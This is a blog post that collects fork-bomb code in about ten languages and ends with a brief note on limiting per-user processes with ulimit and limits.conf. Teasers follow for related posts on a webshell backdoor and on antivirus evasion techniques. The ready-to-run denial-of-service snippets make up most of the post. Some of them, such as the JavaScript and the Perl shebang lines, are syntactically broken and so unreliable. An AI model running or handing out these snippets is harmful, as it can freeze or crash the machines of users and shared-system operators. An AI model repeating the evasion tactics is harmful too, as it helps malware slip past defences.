fork-bomb in several language implements

By -
anyone that has worked with Linux for any amount of time, the word fork bomb will be familiar. However, it's not just a terminal command. Below are some implementations in other languages, followed by mitigation tactics for Linux distros.

BASH
$ :(){ :|: & };:

.sh (Shell file)
#!/bin/bash
./$0|./$0&

.bat (Windows bat implements)
:TOP
start "" %0
goto TOP

~OR~
%0|%0
  #below is the same, but done in command line using ^ to escape specials:
echo %0^|%0 > forkbomb.bat
forkbomb.bat

.pl (Perl implement)
#! /bin/perl
perl -e "fork while fork" &

.py (Python implement)
#! /bin/py
import os
while 1:
    os.fork()

(Java implement)
public class ForkBomb
{
 public static void main(String[] args)
  {
   while(true)
   {
Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
  }
 }
}

.js (JavaScript implement)
function bomb() {
  setTimeout function() {
   for (;;) {
    bomb();
   }
  }, 0);
}

.c (C lang implement)
#include <unistd.h>
int main(void)
{
   while(1) {
    fork(); /* malloc can be used in order to increase the data usage */

   }
}

.asm (Assembly, IA-32)
section .text
   global _start
   
_start:
   mov eax,2 ;System call for forking
   int 0x80 ;Call kernel

   jmp _start

.ps (PowerShell implement)
while($true) { 
   Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";
   Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';}

Mitigation.
The fork bomb's mode of operation, (or MO), is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, use ulimit cmd with the below arguments: ulimit -u 30 This limits the affected user to a maximum of thirty owned processes. On PAM-enabled systems, the limit can be set in /etc/security/limits.conf
and on FreeBSD, root can set limits in
/etc/login.conf


   `r3v

Comments

Post a Comment

Popular posts from this blog

Decryption and Analysis of a "Shell" Backdoor

By -
Image
UPDATE [l] : shortly after finishing this post, I had decided to do a couple scans of the raw code. The results returned several Shell Trojan variants, and doing some permanent damage to windows systems. Reports available at ] VirusTotal ] and [ Malwr ]. Thanks to both services for the great results. It attempted network connx with the original url, not surprise from a webshell, IMO, only a bit strange that the likely 0wn/Op would keep such a trophy case in the wild like that? I mean really??. I would've expected an http request or few since nce that's who was hosting the assets but the requests were made to connect to "Hostthshellcode and then starts the endless streaming of the v1c's data and a continual stream of fresh code for the mal to swap out. This only confirmed the feeling I had about the src code. Multiple langs being used, illogical syntax and it's all just mixed together... if anyone can answer how this can support the back and forth exec using Perl,...
[[ more --»-»

Malware and Successful AV Evasion Tactics

By -
The malware ideology, and even it's entire methodology has morphed over the last year or so. It was decided to write a piece to offer some clarity on the idea of “AV evasion”. There seems to be little in depth working knowledge of the actual various techniques used. Time for a quick lesson to give more definition to this increasingly popular malicious scripting. Below is a list of some of the current successful antivirus evasion tactics used by malware. Hash modification. One way AV’s are able to detect if a file is (or contains) a known malware by calculating the file hash. It avoids this detection by changing a simple bit in the binary thus allowing the file to evade any &OR hash detections. Specific malware signatures. Some signatures are specifically designed to catch an exploit or otherwise spotted by specific behaviors. By only reversing the signature, it is possible for this to modify the malware so no matching patterns reside in it's signature. Just one exam...
[[ more --»-»